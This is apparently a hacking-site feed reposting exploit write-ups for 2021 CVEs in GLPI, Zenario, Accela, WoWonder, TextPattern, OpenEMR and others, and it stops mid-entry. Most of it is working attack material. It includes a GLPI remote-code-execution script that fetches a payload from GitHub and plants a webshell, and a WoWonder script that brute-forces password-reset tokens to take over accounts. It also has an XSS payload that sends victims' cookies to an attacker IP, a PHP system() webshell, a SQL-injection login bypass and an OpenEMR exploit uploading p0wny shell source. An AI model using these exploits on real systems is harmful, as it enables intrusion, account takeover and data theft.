    WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF # Date: 2/10/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/database-backups/ # Version: 1.2.2.6 # Tested on: Windows 10 # CVE: CVE-2021-24174 1. Description: This plugin allows admins to create and download database backups. A CSRF can create DB backups stored publicly in the uploads directory. 2. Proof of Concept: <form action="http://localhost/wp-admin/tools.php?page=database-backups" method="post"> <input type="hidden" name="do_backup_manually" value="1"> <input type="submit" class="button button-primary" value="Do backup" autocomplete="off"> </form> Backups can be accessed by the following URL. http://localhost/wp-content/uploads/database-backups/
  8. HireHackking

    Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated) # Date: 05–02–2021 # Exploit Author: Avinash R # Vendor Homepage: https://zenar.io/ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.52729 # Tested on: Windows 10 Pro (No OS restrictions) # CVE : CVE-2021–27673 # Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38 ##### Step To Reproduce ##### 1) Login to the admin page of Zenario CMS with admin credentials, which is http://server_ip/zenario/admin.php 2) Click on, New → HTML page to create a new sample page and intercept it with your interceptor. 3) Just a single quote on the 'cID' parameter will confirm the SQL injection. 4) After confirming that the 'cID' parameter is vulnerable to SQL injection, feeding the request to SQLMAP will do the rest of the work for you. ############ End ############
  9. HireHackking

    GLPI 9.4.5 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE) # Exploit Author: Brian Peters # Vendor Homepage: https://glpi-project.org # Software Link: https://github.com/glpi-project/glpi/releases # Version: < 9.4.6 # CVE: CVE-2020-11060 # Download a SQL dump and find the table offset for "wifinetworks" with # cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks # Update the offsettable value with this number in the create_dump function # The Nix/Win paths are based on defaults. You can use curl -I <url> and use md5sum to find the path based # on the Set-Cookie hash. #!/usr/bin/python import argparse import json import random import re import requests import string import sys import time from datetime import datetime from lxml import html class GlpiBrowser: def __init__(self, url, user, password, platform): self.url = url self.user = user self.password = password self.platform = platform self.session = requests.Session() self.session.verify = False requests.packages.urllib3.disable_warnings() def extract_csrf(self, html): return re.findall('name="_glpi_csrf_token" value="([a-f0-9]{32})"', html)[0] def get_login_data(self): r = self.session.get('{0}'.format(self.url), allow_redirects=True) csrf_token = self.extract_csrf(r.text) name_field = re.findall('name="(.*)" id="login_name"', r.text)[0] pass_field = re.findall('name="(.*)" id="login_password"', r.text)[0] return name_field, pass_field, csrf_token def login(self): try: name_field, pass_field, csrf_token = self.get_login_data() except Exception as e: print "[-] Login error: could not retrieve form data" sys.exit(1) data = { name_field: self.user, pass_field: self.password, "auth": "local", "submit": "Post", "_glpi_csrf_token": csrf_token } r = self.session.post('{}/front/login.php'.format(self.url), data=data, allow_redirects=False) return r.status_code == 302 def wipe_networks(self, padding, datemod): r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') comment = r.content r = self.session.get('{0}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9'.format(self.url)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Edit network error: could not retrieve form data" sys.exit(1) webpage = html.fromstring(r.content) links = webpage.xpath('//a/@href') for rawlink in links: if "wifinetwork.form.php?id=" in rawlink: rawlinkparts = rawlink.split("=") networkid = rawlinkparts[-1] print "Deleting network "+networkid data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE"+padding, "mode": "ad-hoc", "purge": "Delete permanently", "id": networkid, "_glpi_csrf_token": csrf_token, '_read_date_mod': datemod } r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) def create_network(self, datemod): r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') comment = r.content r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Create network error: could not retrieve form data" sys.exit(1) data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE", "mode": "ad-hoc", "add": "ADD", "_glpi_csrf_token": csrf_token, '_read_date_mod': datemod } r = self.session.post('{}/front/wifinetwork.form.php'.format(self.url), data=data) print "[+] Network created" print " Name: PoC" print " ESSID: RCE" def edit_network(self, padding, datemod): r = self.session.get('https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt') comment = r.content #create the padding for the name and essid r = self.session.get('{0}/front/wifinetwork.php'.format(self.url)) webpage = html.fromstring(r.content) links = webpage.xpath('//a/@href') for rawlink in links: if "wifinetwork.form.php?id=" in rawlink: rawlinkparts = rawlink.split('/') link = rawlinkparts[-1] #edit the network name and essid r = self.session.get('{0}/front/{1}'.format(self.url, link)) try: csrf_token = self.extract_csrf(r.text) except Exception as e: print "[-] Edit network error: could not retrieve form data" sys.exit(1) rawlinkparts = rawlink.split("=") networkid = rawlinkparts[-1] data = { "entities_id": "0", "is_recursive": "0", "name": "PoC", "comment": comment, "essid": "RCE"+padding, "mode": "ad-hoc", "update": "Save", "id": networkid, "_glpi_csrf_token": csrf_token, "_read_date_mod": datemod } r = self.session.post('{0}/front/wifinetwork.form.php'.format(self.url), data=data) print "[+] Network mofified" print " New ESSID: RCE"+padding def create_dump(self, shellname): path='' if self.platform == "Win": path="C:\\xampp\\htdocs\\pics\\" elif self.platform == "Nix": path="/var/www/html/glpi/pics/" #adjust offset number to match the table number for wifi_networks #this can be found by downloading a SQL dump and running cat <dumpname> | grep "CREATE TABLE" | grep -n "wifinetworks" r = self.session.get('{0}/front/backup.php?dump=dump&offsettable=312&fichier={1}{2}'.format(self.url, path, shellname)) print '[+] Shell: {0}/pics/{1}'.format(self.url, shellname) def shell_check(self, shellname): r = self.session.get('{0}/pics/{1}?0=echo%20asdfasdfasdf'.format(self.url, shellname)) print " Shell size: "+str(len(r.content)) if "asdfasdfasdf" in r.content: print "[+] RCE FOUND!" sys.exit(1) return len(r.content) def pwn(self): if not self.login(): print "[-] Login error" return else: print "[+] Logged in" #create timestamp now = datetime.now() datemod = now.strftime("%Y-%m-%d %H:%M:%S") #create comment payload tick=1 while True: #create random shell name letters = string.ascii_letters shellname = ''.join(random.choice(letters) for i in range(8))+".php" #create padding for ESSID padding = '' for i in range(1,int(tick)+1): padding+=str(i) self.wipe_networks(padding, datemod) self.create_network(datemod) self.edit_network(padding, datemod) self.create_dump(shellname) self.shell_check(shellname) print "\n" raw_input("Press any key to continue with the next iteration...") tick+=1 return if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("--url", help="Target URL", required=True) parser.add_argument("--user", help="Username", required=True) parser.add_argument("--password", help="Password", required=True) parser.add_argument("--platform", help="Win/Nix", required=True) args = parser.parse_args() g = GlpiBrowser(args.url, user=args.user, password=args.password, platform=args.platform) g.pwn()
  10. HireHackking

    Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR) # Software Link: https://www.accela.com/civic-platform/ # Version: <= 21.1 # Author: Abdulazeez Alaseeri # Tested on: JBoss server/windows # Type: Web App # Date: 07/06/2021 # CVE: CVE-2021-34369 ================================================================ Accela Civic Platform Insecure Direct Object References <= 21.1 ================================================================ This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber ================================================================ Request Heeaders start ================================================================ GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1 Host: Hidden Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ================================================================ Request Heeaders end ================================================================ ================================================================ Response Heeaders start ================================================================ HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Powered-By: JSP/2.3 Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure X-XSS-Protection: 0 Pragma: No-cache X-UA-Compatible: IE=EDGE Date: Wed, 09 Jun 2021 04:09:40 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 98126 ================================================================ Response Heeaders end ================================================================ contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR
  11. HireHackking

    Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS) # Software Link: https://www.accela.com/civic-platform/ # Version: <= 21.1 # Author: Abdulazeez Alaseeri # Tested on: JBoss server/windows # Type: Web App # Date: 07/06/2021 # CVE-2021-34370 ================================================================ Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 ================================================================ ================================================================ Request Heeaders start ================================================================ GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1 Host: Hidden Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ================================================================ Request Heeaders end ================================================================ ================================================================ Response Heeaders start ================================================================ HTTP/1.1 200 OK Connection: close Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter X-XSS-Protection: 0 Content-Type: text/html;charset=ISO-8859-1 Content-Length: 73 Date: Tue, 08 Jun 2021 10:41:59 GMT <script type='text/javascript'>document.location=''^alert`1`^''</script> ================================================================ Response Heeaders end ================================================================ Payload: %27^alert`1`^%27 for open redirect, replace the payload to a valid website.
  12. HireHackking

    WoWonder Social Network Platform 3.1 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass # Date: 11.06.2021 # Exploit Author: securityforeveryone.com # Researchers : Security For Everyone Team - https://securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows ''' DESCRIPTION In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day. The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999. if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application. ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools ''' import requests import email.utils as eut import calendar, time; import hashlib, re; url = "http://wowonderlab:80/wowonder/" #change this with your target myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"} recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata) b = eut.parsedate(req.headers["Date"]) respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S')) for token in range(111,1000): str2hash = "{0}{1}".format(token,respepoch) email_code = hashlib.md5(str2hash.encode()).hexdigest() req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code)) if len(re.findall("New password",req_reset.text)) == 1: print(email_code) resetdata = {"password": "10711071", "id": "1_"+email_code} reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata) print(reqtoken.headers['Set-Cookie']) break
  13. HireHackking

    COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS) # Date: 11/06/2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Server: XAMPP # Description # COVID19 Testing Management System 1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. Anyone can submit a stored XSS payload without login when registering as a new user. This makes the application store our payload in the database and it is fired everything the dashboard is viewed. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/covid-tms/new-user-testing.php 2) Enter the following payload in 'State' parameter: <script>alert(1)</script> 3) Fill out other information and submit query 4) Now goto: http://localhost/covid-tms/live-test-updates.php 5) Stored XSS payload is fired # Image PoC : Reference Image # 1) Vulnerable Parameter: https://ibb.co/1vyNM2w 2) Payload Fired: https://ibb.co/CsfPnXK
  14. HireHackking

    Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2021-06-11 # Vendor Homepage: https://www.spy-emergency.com/ # Software Link: https://www.spy-emergency.com/download/download.php?id=1 # Tested Version: 25.0.650.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """ Spy Emergency Health Check SpyEmrgHealth C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe Auto Spy Emergency Engine Service SpyEmrgSrv C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe Auto # Service info C:>sc qc "SpyEmrgHealth" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SpyEmrgHealth TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Spy Emergency Health Check DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # Service info C:\>sc qc "SpyEmrgSrv" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SpyEmrgSrv TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Spy Emergency Engine Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  15. HireHackking

    TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) # Date : 2021/09/06 # Exploit Author : Mert Daş merterpreter@gmail.com # Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip # Software web : https://textpattern.com/ # Tested on: Server : Xampp First of all we should use file upload section to upload our shell. Our shell contains this malicious code: <?PHP system($_GET['cmd']);?> 1) Go to content section . 2) Click Files and upload malicious php file. 3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode; After upload our file , our request and respons is like below : Request: GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 10 Jun 2021 00:32:41 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Content-Length: 22 Connection: close Content-Type: text/html; charset=UTF-8 pc\mertdas
  16. HireHackking

    Small CRM 3.0 - 'Authentication Bypass' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection # Date: 12/06/2021 # Exploit Author: BHAVESH KAUL # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/small-crm-php/ # Version: 3.0 # Tested on: Server: XAMPP # Description # Small CRM 3.0 is vulnerable to SQL Injection on it's admin login because of insufficient user supplied data sanitization and the sql injection payload being executed. Attacker is able to access the admin login panel and supply the malicious payload, successfully taking over admin account. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/crm/admin/ 2) Enter the following payload in 'Username' and 'Password' parameter: ' OR 'x'='x 3) SQL Injection successfull
  17. HireHackking

    Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated) # Date: 11/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # Version: 1.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : Stock Management System suffers from SQL injection in '/stock/php_action/changePassword.php' because it does not sanitize the input before pushing into the sql query. Leading to remote code execution. - Vulnerable parameter: user_id=<injection point> SQLmap command: -------------- sqlmap -u http://<target_host>/stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=<your cookie>" --is-dba SQLmap Output: ------------- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH) Trick: ----- We could steal the users cookie by chaining CSRF and stored XSS <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<YOUR_TARGET>/stock/php_action/changeUsername.php" method="POST"> <input type="hidden" name="username" value=""><script> alert(document.cookie); var i=new Image; i.src="http://<YOUR_IP>:<YOUR_PORT>/?"+document.cookie; </script>" /> <input type="hidden" name="user&#95;id" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html> and then use the cookie to preform SQL injection :)
  18. HireHackking

    WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 13-06-2021 # Vendor Homepage: https://www.wibu.com # Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html # Tested Version: 6.51 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ WIBU-KEY Server WkSvW32.exe C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe Auto C:\Users\IEUser>sc qc WkSvW32.exe [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WkSvW32.exe TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WIBU-KEY Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  19. HireHackking

    OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) # Date 12.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip # Version: Prior to 5.0.1.4 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-15139 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 ''' Description: Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory. ''' ''' Banner: ''' banner =""" ___ _____ __ __ ____ ____ ___ _ _____ / _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ / | | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \ | |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/ |_| _____ _ _ _ | ____|_ ___ __ | | ___ (_) |_ | _| \ \/ / '_ \| |/ _ \| | __| | |___ > <| |_) | | (_) | | |_ |_____/_/\_\ .__/|_|\___/|_|\__| |_| """ print(banner) ''' Import required modules ''' import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT openemr_path = args.PATH username = args.USERNAME password = args.PASSWORD ''' Authentication: ''' # Preparation: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' response = session.get(auth_chek_url) # Header (auth): header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Referer': auth_chek_url, 'Upgrade-Insecure-Requests': '1', } # Body (auth): body = { 'new_login_session_management': '1', 'authProvider': 'Default', 'authUser': username, 'clearPass': password, 'languageChoice': '1' } # Authentication: print('') print('[+] Authentication') auth = session.post(auth_url,headers=header, data=body) ''' Exploit: ''' print('') print('[+] Uploading Webshell:') # URL: exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' # Headers (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339", "Origin": "http://" + target_ip, "Connection": "close", "Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', "Upgrade-Insecure-Requests": "1" } # Body (Exploit): body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" 